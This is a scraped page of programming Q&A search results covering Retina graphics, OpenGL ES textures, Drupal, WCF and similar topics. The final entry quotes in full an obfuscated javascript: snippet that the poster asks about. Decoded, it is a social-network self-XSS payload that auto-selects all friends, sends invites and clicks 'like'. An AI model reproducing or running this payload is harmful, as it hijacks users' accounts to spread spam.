Search Results

Search found 9611 results on 385 pages for 'low power'.

Page 335/385 | < Previous Page | 331 332 333 334 335 336 337 338 339 340 341 342  | Next Page >

  • How to create a CGBitmapContext which works for Retina display and not wasting space for regular display?

    - by ????
    Is it true that if it is in UIKit, including drawRect, the HD aspect of Retina display is automatically handled? So does that mean in drawRect, the current graphics context for a 1024 x 768 view is actually a 2048 x 1536 pixel Bitmap context? (is there a way to print this size out to verify it). We actually enjoy the luxury of 1 point = 4 pixels automatically handled for us. However, if we use CGBitmapContextCreate, then those will really be pixels, not points? (at least if we provide a data buffer for that bitmap, the size is not for the higher resolution, but for the standard resolution, and even if we pass NULL as the buffer so that CGBitmapContextCreate handles the buffer for us, the size probably is the same as if we pass in a data buffer, and it is just standard resolution, not Retina's resolution). We can always create 2048 x 1536 for iPad 1 and iPad 2 as well as the New iPad, but it will waste memory and processor and GPU power, as it is only needed for the New iPad. So do we have to use a if () { } else { } to create such a bitmap context and how do we actually do so? And all our code CGContextMoveToPoint has to be adjusted for Retina display to use x * 2 and y * 2 vs non-retina display of just using x, y as well? That can be quite messy for the code. (or maybe we can define a local variable scaleFactor and set it to 1 for standard resolution and 2 if it is retina, so our x and y will always be x * scaleFactor, y * scaleFactor instead of just x and y.) It seems that UIGraphicsBeginImageContextWithOptions can create one for Retina automatically if the scale of 0.0 is passed in, but I don't think it can be used if I need to create the context and keep it (and using ivar or property of UIViewController to hold it). If I don't release it using UIGraphicsEndImageContext, then it stays in the graphics context stack, so it seems like I have to use CGBitmapContextCreate instead. (or do we just let it stay at the bottom of the stack and not worry about it?)

    Read the article

  • Overriding Node Paths

    - by fighella
    Can a PAGE override the priority of a NODE? I want to use the power of "Pages" to override my links from the nodes... For example: A nodes link is /content/202/hello-world I want to use my Panels to use the URL to create a "PAGE"... The panels can use the arguments from the URL to create a pretty cool page around the content of a node... So the PAGE path I've made is /content/%argument1/%title... I need the links created to the node from the node itself to go to this panel page and not to the content created by the node on its own... so i make the path alias do the same as the PAGE settings... /content/nid/title... A hand typed in link to this PAGE works fine when I dont have this as the path alias... It does exactly what I need... but as soon as I make this the Path Alias, it's like it goes to the single NODE before it goes to the PAGE... Anyone have any clues... Is there an order which Drupal looks for the correct URL? Im sure I have done this before. JD

    Read the article

  • Drawing only part of a texture OpenGL ES iPhone

    - by Ben Reeves
    ..Continued on from my previous question I have a 320*480 RGB565 framebuffer which I wish to draw using OpenGL ES 1.0 on the iPhone. - (void)setupView { glTexParameteri(GL_TEXTURE_2D, GL_TEXTURE_MIN_FILTER, GL_LINEAR); glTexParameteriv(GL_TEXTURE_2D, GL_TEXTURE_CROP_RECT_OES, (int[4]){0, 0, 480, 320}); glEnable(GL_TEXTURE_2D); } // Updates the OpenGL view when the timer fires - (void)drawView { // Make sure that you are drawing to the current context [EAGLContext setCurrentContext:context]; //Get the 320*480 buffer const int8_t * frameBuf = [source getNextBuffer]; //Create enough storage for a 512x512 power of 2 texture int8_t lBuf[2*512*512]; memcpy (lBuf, frameBuf, 320*480*2); //Upload the texture glTexImage2D(GL_TEXTURE_2D, 0, GL_RGB, 512, 512, 0, GL_RGB, GL_UNSIGNED_SHORT_5_6_5, lBuf); //Draw it glDrawTexiOES(0, 0, 1, 480, 320); [context presentRenderbuffer:GL_RENDERBUFFER_OES]; } If I produce the original texture in 512*512 the output is cropped incorrectly but other than that looks fine. However using the require output size of 320*480 everything is distorted and messed up. I'm pretty sure it's the way I'm copying the framebuffer into the new 512*512 buffer. I have tried this routine int8_t lBuf[512][512][2]; const char * frameDataP = frameData; for (int ii = 0; ii < 480; ++ii) { memcpy(lBuf[ii], frameDataP, 320); frameDataP += 320; } Which is better, but the width appears to be stretched and the height is messed up. Any help appreciated.

    Read the article

  • android & libgdx - disable blurry images rendering

    - by android developer
    i'm trying out libgdx as an opengl wrapper , and i have some issues with its graphical rendering : for some reason , all images (textures) on android device look a little blurred using libgdx . this also includes text (font) . however, for normal images , even though i show the entire image , i expect it to look as sharp as i see it on a computer , especially if i have such a good screen on the device (it's galaxy nexus) . i've tried to set the anti-aliasing off , by using the next code : final AndroidApplicationConfiguration androidApplicationConfiguration=new AndroidApplicationConfiguration(); androidApplicationConfiguration.numSamples=0; //tried the value of 1 too. ... i've also tried to set the scaling method to various methods , but with no luck. example: texture.setFilter(TextureFilter.Nearest,TextureFilter.Nearest); as a test , i've found a sharp image that is exactly the same as the seen resolution on the device (720x1184 for galaxy nexus , because of the buttons bar) , and i've put it to be on the background of the libgdx app . of course , i had to add extra blank space in order for the texute to be loaded , so the final size of the image (which will include content and empty space) is still a power of 2 for both width and height (1024x2048 in my case) . on the desktop app , it look ok . on the device , it looked blurred. a weird thing that i've noticed is that when i change the device's orientation (horizontal <= vertical) , for the very short time before the rotating animation starts , i see both the image and the text very well . can anyone please help me?

    Read the article

  • Fast, very lightweight algorithm for camera motion detection?

    - by Ertebolle
    I'm working on an augmented reality app for iPhone that involves a very processor-intensive object recognition algorithm (pushing the CPU at 100% it can get through maybe 5 frames per second), and in an effort to both save battery power and make the whole thing less "jittery" I'm trying to come up with a way to only run that object recognizer when the user is actually moving the camera around. My first thought was to simply use the iPhone's accelerometers / gyroscope, but in testing I found that very often people would move the iPhone at a consistent enough attitude and velocity that there wouldn't be any way to tell that it was still in motion. So that left the option of analyzing the actual video feed and detecting movement in that. I got OpenCV working and tried running their pyramidal Lucas-Kanade optical flow algorithm, which works well but seems to be almost as processor-intensive as my object recognizer - I can get it to an acceptable framerate if I lower the depth levels / downsample the image / track fewer points, but then accuracy suffers and it starts to miss some large movements and trigger on small hand-shaking-y ones. So my question is, is there another optical flow algorithm that's faster than Lucas-Kanade if I just want to detect the overall magnitude of camera movement? I don't need to track individual objects, I don't even need to know which direction the camera is moving, all I really need is a way to feed something two frames of video and have it tell me how far apart they are.

    Read the article

  • Handling XMLHttpRequest to call external application

    - by Ian
    I need a simple way to use XMLHttpRequest as a way for a web client to access applications in an embedded device. I'm getting confused trying to figure out how to make something thin and light that handles the XMLHttpRequests coming to the web server and can translate those to application calls. The situation: The web client using Ajax (ExtJS specifically) needs to send and receive asynchronously to an existing embedded application. This isn't just to have a thick client/thin server, the client needs to run background checking on the application status. The application can expose a socket interface, with a known set of commands, events, and configuration values. Configuration could probably be transmitted as XML since it comes from a SQLite database. In between the client and app is a lighttpd web server running something that somehow handles the translation. This something is the problem. What I think I want: Lighttpd can use FastCGI to route all XMLHttpRequest to an external process. This process will understand HTML/XML, and translate between that and the application's language. It will have custom logic to simulate pushing notifications to the client (receive XMLHttpRequest, don't respond until the next notification is available). C/C++. I'd really like to avoid installing Java/PHP/Perl on an embedded device. So I'll need more low level understanding. How do I do this? Are there good C++ libraries for interpreting the CGI headers and HTML so that I don't have to do any syntax processing, I can just deal with the request/response contents? Are there any good references to exactly what goes on, server side, when handling the XMLHttpRequest and CGI interfaces? Is there any package that does most of this job already, or will I have to build the non-HTTP/CGI stuff from scratch? Thanks for any help! I am really having trouble learning about the server side of these technologies.

    Read the article

  • Drawing only part of a

    - by Ben Reeves
    ..Continued on from my previous question I have a 320*480 RGB565 framebuffer which I wish to draw using OpenGL ES 1.0 on the iPhone. - (void)setupView { glTexParameteri(GL_TEXTURE_2D, GL_TEXTURE_MIN_FILTER, GL_LINEAR); glTexParameteriv(GL_TEXTURE_2D, GL_TEXTURE_CROP_RECT_OES, (int[4]){0, 0, 480, 320}); glEnable(GL_TEXTURE_2D); } // Updates the OpenGL view when the timer fires - (void)drawView { // Make sure that you are drawing to the current context [EAGLContext setCurrentContext:context]; //Get the 320*480 buffer const int8_t * frameBuf = [source getNextBuffer]; //Create enough storage for a 512x512 power of 2 texture int8_t lBuf[2*512*512]; memcpy (lBuf, frameBuf, 320*480*2); //Upload the texture glTexImage2D(GL_TEXTURE_2D, 0, GL_RGB, 512, 512, 0, GL_RGB, GL_UNSIGNED_SHORT_5_6_5, lBuf); //Draw it glDrawTexiOES(0, 0, 1, 480, 320); [context presentRenderbuffer:GL_RENDERBUFFER_OES]; } If I produce the original texture in 512*512 the output is cropped incorrectly but other than that looks fine. However using the require output size of 320*480 everything is distorted and messed up. I'm pretty sure it's the way I'm copying the framebuffer into the new 512*512 buffer. I have tried this routine int8_t lBuf[512][512][2]; const char * frameDataP = frameData; for (int ii = 0; ii < 480; ++ii) { memcpy(lBuf[ii], frameDataP, 320); frameDataP += 320; } Which is better, but the width appears to be stretched and the height is messed up. Any help appreciated.

    Read the article

  • How to generate random numbers of lognormal distribution within specific range in Matlab

    - by Harpreet
    My grain sizes are defined as D=[1.19,1.00,0.84,0.71,0.59,0.50,0.42]. The problem is described below in steps. Grain sizes should follow lognormal distribution. The mean of the grain sizes is fixed as 0.84 and the standard deviation should be as low as possible but not zero. 90% of the grains (by weight %) fall in the size range of 1.19 to 0.59, and the rest 10% fall in size range of 0.50 to 0.42. Now I want to find the probabilities (weight percentage) of the grains falling in each grain size. It is allowable to split this grain size distribution into further small sizes but it must always be in the range of 1.19 and 0.42, i.e. 'D' can be continuous but 0.42 < D < 1.19. I need it fast. I tried on my own but I am not able to get the correct result. I am getting negative probabilities (weight percentages). Thanks to anyone who helps. I didn't incorporate the point 3 as I came to know about that condition later. Here are simple steps I tried: %% D=[1.19,1.00,0.84,0.71,0.59,0.50,0.42]; s=0.30; % std dev of the lognormal distribution m=0.84; % mean of the lognormal distribution mu=log(m^2/sqrt(s^2+m^2)); % mean of the associated normal dist. sigma=sqrt(log((s^2/m^2)+1)); % std dev of the associated normal dist. [r,c]=size(D); for i=1:c D(i)=mu+(sigma.*randn(1)); w(i)=(log(D(i))-mu)/sigma; % the probability or the wt. percentage of the grain sizes end grain_size=exp(D); %%

    Read the article

  • iPhone OS: Why is my managedModelObject not complying with Key Value Coding?

    - by nickthedude
    Ok so I'm trying to build this stat tracker for my app and I have built a data model object called statTracker that keeps track of all the stuff I want it to. I can set and retrieve values using the selectors, but if I try and use KVC (ie setValue: forKey: ) everything goes bad and says my StatTracker class is not KVC compliant: valueForUndefinedKey:]: the entity StatTracker is not key value coding-compliant for the key "timesLauched".' 2010-05-18 15:55:08.573 here's the code that is triggering it: NSArray *statTrackerArray = [[NSArray alloc] init]; statTrackerArray = [[CoreDataSingleton sharedCoreDataSingleton] getStatTracker]; NSNumber *number1 = [[NSNumber alloc] init]; number1 = [NSNumber numberWithInt:(1 + [[(StatTracker *)[statTrackerArray objectAtIndex:0] valueForKey:@"timesLauched"] intValue])]; [(StatTracker *)[statTrackerArray objectAtIndex:0] setValue:number1 forKey:@"timesLaunched" ]; NSError *error; if (![[[CoreDataSingleton sharedCoreDataSingleton] managedObjectContext] save:&error]) { NSLog(@"error writing to db"); } Not sure if this is enough code for you folks let me know what you need if you do need more. This would be so sweet if I could use KVC because I could then abstract all this stat tracking stuff into a single method call with a string argument for the value in question. At least that is what I hope to accomplish here. I'm actually now understanding the power of KVC but now I'm just trying to figure out how to make it work. Thanks! Nick

    Read the article

  • DVCS with a Windows central repository

    - by Mikko Rantanen
    We are currently using VSS for version control. Quite few of our developers are interested in a distributed model (And want to get rid of VSS). Our network is full of Windows machines and while our IT department has experience maintaining Linux machines they would prefer not to. What DVCS systems can host their central repository on Windows while providing.. Push access to the repository. Basic authentication. Mostly just a way to allow or deny access to the whole repository. No need for fine grained access. Server process so users don't need write right to the repository reducing the risk of accidentally messing with it. On the client side a GUI such as Tortoise would be more or less a requirement (Sorry, Windows shell sucks. :|). Ease of installation would be a huge plus as our IT department is already quite low on resources. And using windows credentials for authentication would be an advantage but not a requirement as long as the client is able to store the credentials. I have had a (really) quick look at Git, Mercurial and Bazaar. Git seemed to use ssh or simple WebDAV for repository access, requiring write permission for the users. Mercurial had a built in http server, but this seemed to be only for pull purposes. Update: Mercurial supports push as well. Bazaar Seemed to use sftp for repository access, again requiring a write permission for the users. Are there windows server processes for any DVCS systems and has anyone managed to set one up in a Windows land? And apologies if this is a duplicate question. I couldn't find one. Update Got Mercurial working for push purposes! Detailed list what was required can be found as an answer below.

    Read the article

  • Payment Processors - What do I need to know if I want to accept credit cards on my website?

    - by Michael Pryor
    This question talks about different payment processors and what they cost, but I'm looking for the answer to what do I need to do if I want to accept credit card payments? Assume I need to store credit card numbers for customers, so that the obvious solution of relying on the credit card processor to do the heavy lifting is not available. PCI Data Security, which is apparently the standard for storing credit card info, has a bunch of general requirements, but how does one implement them? And what about the vendors, like Visa, who have their own best practices? Do I need to have keyfob access to the machine? What about physically protecting it from hackers in the building? Or even what if someone got their hands on the backup files with the sql server data files on it? What about backups? Are there other physical copies of that data around? Tip: If you get a merchant account, you should negotiate that they charge you "interchange-plus" instead of tiered pricing. With tiered pricing, they will charge you different rates based on what type of Visa/MC is used -- ie. they charge you more for cards with big rewards attached to them. Interchange plus billing means you only pay the processor what Visa/MC charges them, plus a flat fee. (Amex and Discover charge their own rates directly to merchants, so this doesn't apply to those cards. You'll find Amex rates to be in the 3% range and Discover could be as low as 1%. Visa/MC is in the 2% range). This service is supposed to do the negotiation for you (I haven't used it, this is not an ad, and I'm not affiliated with the website, but this service is greatly needed.) This blog post gives a complete rundown of handling credit cards (specifically for the UK).

    Read the article

  • Splitting build cross the network?

    - by Dandikas
    Is there a known solution for splitting build process cross the network machines? Use case: We are an average software development company. We own around 50 development workstations (Quad Core 2.66Ghz, 4 GB ram, 200 GB raid). No need to tell that at any single moment not every machine is loaded to the max. There are 5 to 15 projects running simultaneously at any single moment. Obviously all of them are continuously build on server, than deployed to proper environment. Single project build is taking from 3 to 15 minutes. The problem: Whenever we build 5 projects in a row the last project is going to be ready after around 25 - 50 minutes. Building in parallel does not solve the problem (build is only a part of the game, than you need to deploy, run tests etc.) YES the correct solution is to add another build server, but "That involves buying new Expensive hardware, and we already spent a lot!". Yea, right(damn them)! Anyway. What about splitting build among developers workstation? Lets say whenever we need to build project "A" we check 5 workstations and start build on all that are not overloaded. The build can be canceled by a developer if he really needs all the power of his machine as long as there is at least 1 machine that is still building. After build is finished deployment can be performed to a proper environment (hosted on some server, not on workstation :) ). The bigger the company the more this makes sense to me. Anyone tried something like this? Are there any good practices? Any helpful software? (90% of the projects are .net C#)

    Read the article

  • Simplest way to debug an android bluetooth application

    - by intiha
    I am trying to test and build a sample android application that can simply connect to a BT server to send and receive a few packets. Since the emulator has no support what is the next best thing to test BT communication? Can I just run a code that acts as a server on my laptop and dumps BT connection onto a console? Do I have to write this code, or is their a simple tool that saves me that hassle? One more thing, I have windows 7, and currently I attach to my PC an anycom USB BT adapter. This is able to show up my nexus one as a BT device. I can pair to my laptop but connection always fails. When it tries to pair I have tried both 0000 and 1234 as suggested on my nexus, but in my connection list it still lists my laptop as paired but not connected. Any idea why? I searched for this problem and apparently people talk about rebooting and power cycling BT, but these solutions dont work for me. Thanks. Affan.

    Read the article

  • Problem with load testing Web Service - VSTS 2008

    - by Carlos
    Hello, I have a webtest with makes a simple call to a WebService which looks like that: MyWebService webService = new MyWebService(); webService.Timeout = 180000; webService.myMethod(); I am not using ThinkTimes, also the Run Duration is set to 5 minutes. When I ran this test simulating only 1 user, I check the counters and I found something like that: Tests Total: 4500 Network Interface\Bytes sent (agent machine): 35,500 Then I ran the same tests, but this time simulating 2 users and I got something like that: Tests Total: 2225 Network Interface\Bytes sent (agent machine): 30,500 So when I increased the numbers of users the tests/sec was half than when I use only 1 user and the bytes sent by the agent was also lower. I think it is strange, because it doesn't seems I have a bottleneck in my agent machine since CPU is never higher than 30% and I have over 1.5GB of RAM free, also my network utilization is like 0.5% of its capacity. In order to troubleshot this I ran a test using Step Pattern, the simulated users went from 20 to 800 users. When I check the requests/sec it is practically constant through the whole test, so it is clear there is something in my test or my environment which is preventing the number of requests from gets higher. It would be a expected behavior if the "response time" was getting higher because it would tell me the requests wasn't been processed properly, but the strange thing is the response time is practically constant all the time and it is pretty low actually. I have no idea why my agent can't send more requests when I increase the numbers of users, any help/tip/guess would be really appreciate.

    Read the article

  • Can iPad/iPhone Touch Points be Wrong Due to Calibration?

    - by Kristopher Johnson
    I have an iPad application that uses the whole screen (that is, UIStatusBarHidden is set true in the Info.plist file). The main window's frame is set to (0, 0, 768, 1024), as is the main view in that frame. The main view has multitouch enabled. The view has code to handle touches: - (void)touchesMoved:(NSSet *)touches withEvent:(UIEvent *)event { for (UITouch *touch in touches) { CGPoint location = [touch locationInView:nil]; NSLog(@"touchesMoved at location %@", NSStringFromCGPoint(location)); } } When I run the app in the simulator, it works pretty much as expected. As I move the mouse from one edge of the screen to the other, reported X values go from 0 to 767. Reported Y values go from 20 to 1023, but it is a known issue that the simulator doesn't report touches in the top 20 pixels of the screen, even when there is no status bar. Here's what's weird: When I run the app on an actual iPad, the X values go from 0 to 767 as expected, but reported Y values go from -6 to 1017. The fact that it seems to work properly on the simulator leads me to suspect that real devices' touchscreens are not perfectly calibrated, and mine is simply reporting values six pixels too low. Can anyone verify that this is the case? Otherwise, is there anything else that could account for the Y values being six pixels off from what I expect? (In a few days, I should have a second iPad, so I can test this with another device and compare the results.)

    Read the article

  • working with large sprite sheets on iphone

    - by lukya
    Hi All, I am trying to use sprite sheet animation in my application. The first POC with a small sprite sheet worked fine but as i change the sprite sheet to a bigger one, i get "check_safe_call: could not restore current frame" warning and the application quits. A quick search revealed that this problem meant my app is taking too much memory or the image is too huge in dimension. My image is 4.9 Mb and dimensions are 6720 * 10080 (oops!!). i read that iphone allows maximum 3 Mb image with dimensions up to 1024 * 1024. Also that the sprite sheet image dimensions should be a power of two. So please let me know how i can use a sprite sheet this big. One approach could be to cut the sprite sheet into many smaller sprite sheets and use them one at a time. Please suggest if you know any other/better approach to accommodate bigger sprite sheets and whether the problem with my sprite sheet is size (4.9 Mb) OR dimensions (6720 * 10080). (Just FYI, i am not trying to play a movie so using MP4 file instead is not an option for me. i need to animate the sprite sheet based on accelerometer input and i have been able to achieve that in my POC with smaller sprite sheet.) Thanks, Swapnil

    Read the article

  • Load Spikes on a Apache MySQL Server with Wordpress MU

    - by Vikram Goyal
    Hi there, I am trying to investigate the reasons for some mysterious load spikes on a Linux Apache server (2.2.14) running PHP 5.2.9 on a dedicated server with enough processing power and memory. My primary web application is a Wordpress MU (2.9.2) installation. I have investigated and ruled out DOS attack, MySQL or Apache configuration issues. The log files don't give me anything of interest, except to tell me that there is severe load. The load (which can go up to 100) just seems to come and go. It helps that I have a script that checks every 3 minutes for the load, and restarts Apache. Restarting it helps, and the server comes back, till it happens again. There seems to be no set time frame, or visitor numbers on the site that can trigger this. Even a low number of concurrent visitors (20) can trigger it. I am almost convinced that there is a rewrite loop somewhere that is causing Apache to go mad. Apache is trying to serve something that is causing it to spawn more and more processes till it keels over. My question is: Given that I am convinced that this is a rewrite issue or something similar, how can I try and figure out what the issue is? What should I monitor? Apache logs are voluminous, and not very helpful. Of course, if this is not the issue, then at least knowing what to look for will help me eliminate this as an issue and look for something else. Thanks! Vikram

    Read the article

  • Returning large collections from WCF Serivce

    - by Nate Bross
    I'm trying to determine the best approach for building a WCF Service, and the area I'm struggling with most is returning lists of objects. The built-in maxMessageSize of 64k seems pretty high, and I really don't want to bump it up (quick googling finds 100s of places bumping the maxMessageSize up to multi-gigabyte range which seems foolish). But, when I'm returning a collection of objects (~150 items) I am exceeding the default 64k. I'm almost to the point of returning my own class which inherits IEnumerable and has properties for hasNext, hasPrevious and PageSize so that I can implement paging on the client side -- this seems like alot of code. The other option is to jackup the maxMessageSize and hope for the best, but that feels wrong. All other aspects of my service are working great, its just returning large collectiosn where I'm having issues. For background, there are two types of consumers of this service, UI applications which will be primarly web and/or wpf applications, and data processing applications, .NET console apps, and maybe some other non-UI apps. For the UI applications, I would like to keep them responsive and keep the messageSize low, on the console apps it doesn't matter as much as they are just pulling data down to do processing and push it back up to the service.

    Read the article

  • Cross-Platform Language + GUI Toolkit for Prototyping Multimedia Applications

    - by msutherl
    I'm looking for a language + GUI toolkit for rapidly prototyping utility applications for multimedia installations. I've been working with Max/MSP/Jitter for many years, but I'd like to add a text-based language to my 'arsenal' for tasks apart from 'content production'. (When it comes to actual media synthesis, my choices are clear [SuperCollider + MSP for audio, Jitter + Quartz + openFrameworks for video]). I'm looking for something that maintains some of the advantages of Max, but is lower-level, faster, more cross-platfrom (Linux support), and text-based. Integration with powerful sound/video libraries is not a requirement. Some requirements: Cross-platform (at least OSX and Linux, Windows is a plus) Fast and easy cross-platform GUIs with no platform-specific modification GUI code separated from backend code as much as possible Good for interfacing with external serial devices (micro-controllers) Good network support (UDP/TCP) Good libraries for multi-media (video, sound, OSC) are a plus Asynchronous synchronous UNIX integration is a plus The options that come to mind: AS3/Flex (not a fan of AS3 or the idea of running in the Flash Player) openFrameworks (C++ framework, perhaps a bit too low level [looking for fast development time] and biased toward video work) Java w/ Processing libraries (like openFrameworks, just slower) Python + Qt (is Qt appropriate for rapid prototyping?) Python + Another GUI toolkit SuperCollider + Swing (yucky GUI development) Java w/ SWT Any other options? What do you recommend?

    Read the article

  • What do you use to play sound in iPhone games?

    - by zoul
    Hello! I have a performance-intensive iPhone game I would like to add sounds to. There seem to be about three main choices: (1) AVAudioPlayer, (2) Audio Queues and (3) OpenAL. I’d hate to write pages of low-level code just to play a sample, so that I would like to use AVAudioPlayer. The problem is that it seems to kill the performace – I’ve done a simple measuring using CFAbsoluteTimeGetCurrent and the play message seems to take somewhere from 9 to 30 ms to finish. That’s quite miserable, considering that 25 ms == 40 fps. Of course there is the prepareToPlay method that should speed things up. That’s why I wrote a simple class that keeps several AVAudioPlayers at its disposal, prepares them beforehand and then plays the sample using the prepared player. No cigar, still it takes the ~20 ms I mentioned above. Such performance is unusable for games, so what do you use to play sounds with a decent performance on iPhone? Am I doing something wrong with the AVAudioPlayer? Do you play sounds with Audio Queues? (I’ve written something akin to AVAudioPlayer before 2.2 came out and I would love to spare that experience.) Do you use OpenAL? If yes, is there a simple way to play sounds with OpenAL, or do you have to write pages of code? Update: Yes, playing sounds with OpenAL is fairly simple.

    Read the article

  • Hibernate JDBCConnectionException: Communications link failure and java.io.EOFException: Can not read response from server

    - by Marc
    I get a quite well-known using MySql jdbc driver : JDBCConnectionException: Communications link failure, java.io.EOFException: Can not read response from server. This is caused by the wait_timeout parameter in my.cnf. So I decided to use c3p0 pool connection along with Hibernate. Here is what I added to hibernate.cfg.xml : <property name="hibernate.connection.provider_class">org.hibernate.connection.C3P0ConnectionProvider</property> <property name="c3p0.min_size">10</property> <property name="c3p0.max_size">100</property> <property name="c3p0.timeout">1000</property> <property name="c3p0.preferredTestQuery">SELECT 1</property> <property name="c3p0.acquire_increment">1</property> <property name="c3p0.idle_test_period">2</property> <property name="c3p0.max_statements">50</property> idle_test_period is volontarily low for test purposes. Looking at the mysql logs I can see the "SELECT 1" request which is regularly sent to the mysql server so it works. Unfortunately I still get this EOF exception within my app if I wait longer than 'wait_timout' seconds (set to 10 for test purposes). I'm using Hibernate 4.1.1 and mysql-jdbc-connector 5.1.18. So what am I doing wrong? Thanks, Marc.

    Read the article

  • How do I detect if both left and right buttons are pushed?

    - by Greg McGuffey
    I would like have three mouse actions over a control: left, right and BOTH. I've got the left and right and am currently using the middle button for the third, but am curious how I could use the left and right buttons being pressed together, for those situations where the user has a mouse without a middle button. This would be handled in the OnMouseDown method of a custom control. UPDATE After reviewing the suggested answers, I need to clarify that what I was attempting to do was to take action on the mouse click in the MouseDown event (actually OnMouseDown method of a control). Because it appears that .NET will always raise two MouseDown events when both the left and right buttons on the mouse are clicked (one for each button), I'm guessing the only way to do this would be either do some low level windows message management or to implement some sort of delayed execution of an action after MouseDown. In the end, it is just way simpler to use the middle mouse button. Now, if the action took place on MouseUp, then Gary's or nos's suggestions would work well. Any further insights on this problem would be appreciated. Thanks!

    Read the article

  • Convert pre-IEEE-574 C++ floating-point numbers to/from C#

    - by Richard Kucia
    Before .Net, before math coprocessors, before IEEE-574, Microsoft defined a bit pattern for floating-point numbers. Old versions of the C++ compiler happily used that definition. I am writing a C# app that needs to read/write such floating-point numbers in a file. How can I do the conversions between the 2 bit formats? I need conversion methods in both directions. This app is going to run in a PocketPC/WinCE environment. Changing the structure of the file is out-of-scope for this project. Is there a C++ compiler option that instructs it to use the old FP format? That would be ideal. I could then exchange data between the C# code and C++ code by using a null-terminated text string, and the C++ methods would be simple wrappers around sprintf and atof functions. At the very least, I'm hoping someone can reply with the bit definitions for the old FP format, so I can put together a low-level bit manipulation algorithm if necessary. Thanks.

    Read the article

  • Targeted Simplify in Mathematica

    - by Timo
    I generate very long and complex analytic expressions of the general form: (...something not so complex...)(...ditto...)(...ditto...)...lots... When I try to use Simplify, Mathematica grinds to a halt, I am assuming due to the fact that it tries to expand the brackets and or simplify across different brackets. The brackets, while containing long expressions, are easily simplified by Mathematica on their own. Is there some way I can limit the scope of Simplify to a single bracket at a time? Edit: Some additional info and progress. So using the advice from you guys I have now started using something in the vein of In[1]:= trouble = Log[(x + I y) (x - I y) + Sqrt[(a + I b) (a - I b)]]; In[2]:= Replace[trouble, form_ /; (Head[form] == Times) :> Simplify[form],{3}] Out[2]= Log[Sqrt[a^2 + b^2] + (x - I y) (x + I y)] Changing Times to an appropriate head like Plus or Power makes it possible to target the simplification quite accurately. The problem / question that remains, though, is the following: Simplify will still descend deeper than the level specified to Replace, e.g. In[3]:= Replace[trouble, form_ /; (Head[form] == Plus) :> Simplify[form], {1}] Out[3]= Log[Sqrt[a^2 + b^2] + x^2 + y^2] simplifies the square root as well. My plan was to iteratively use Replace from the bottom up one level at a time, but this clearly will result in vast amount of repeated work by Simplify and ultimately result in the exact same bogging down of Mathematica I experienced in the outset. Is there a way to restrict Simplify to a certain level(s)? I realize that this sort of restriction may not produce optimal results, but the idea here is getting something that is "good enough".

    Read the article

  • What does this code do

    - by Wardy
    Ok someone who happens to be a good friend of mine is sending me some odd emails lately one of which was a link to a page that asks you to copy and paste this in to your address bar in your browser then execute it ... javascript:(function(){a='app125879300771588_jop';b='app125879300771588_jode';ifc='app125879300771588_ifc';ifo='app125879300771588_ifo';mw='app125879300771588_mwrapper';var _0xc100=["\x76\x69\x73\x69\x62\x69\x6C\x69\x74\x79","\x73\x74\x79\x6C\x65","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x42\x79\x49\x64","\x68\x69\x64\x64\x65\x6E","\x69\x6E\x6E\x65\x72\x48\x54\x4D\x4C","\x76\x61\x6C\x75\x65","\x63\x6C\x69\x63\x6B","\x73\x75\x67\x67\x65\x73\x74","\x73\x65\x6C\x65\x63\x74\x5F\x61\x6C\x6C","\x73\x67\x6D\x5F\x69\x6E\x76\x69\x74\x65\x5F\x66\x6F\x72\x6D","\x2F\x61\x6A\x61\x78\x2F\x73\x6F\x63\x69\x61\x6C\x5F\x67\x72\x61\x70\x68\x2F\x69\x6E\x76\x69\x74\x65\x5F\x64\x69\x61\x6C\x6F\x67\x2E\x70\x68\x70","\x73\x75\x62\x6D\x69\x74\x44\x69\x61\x6C\x6F\x67","\x6C\x69\x6B\x65\x6D\x65"];d=document;d[_0xc100[2]](mw)[_0xc100[1]][_0xc100[0]]=_0xc100[3];d[_0xc100[2]](a)[_0xc100[4]]=d[_0xc100[2]](b)[_0xc100[5]];d[_0xc100[2]](_0xc100[7])[_0xc100[6]]();setTimeout(function (){fs[_0xc100[8]]();} ,5000);setTimeout(function (){SocialGraphManager[_0xc100[11]](_0xc100[9],_0xc100[10]);} ,5000);setTimeout(function (){d[_0xc100[2]](_0xc100[12])[_0xc100[6]]();d[_0xc100[2]](ifo)[_0xc100[4]]=d[_0xc100[2]](ifc)[_0xc100[5]];} ,5000);})(); Not being totally with it when it comes to low level programming i'm curious as to what the email is asking here ... PLEASE DO NOT RUN THIS CODE UNLESS YOU ARE HAPPY THAT IT WILL NOT BREAK ANYTHING. But ... Could someone tell me what it does?

    Read the article

< Previous Page | 331 332 333 334 335 336 337 338 339 340 341 342  | Next Page >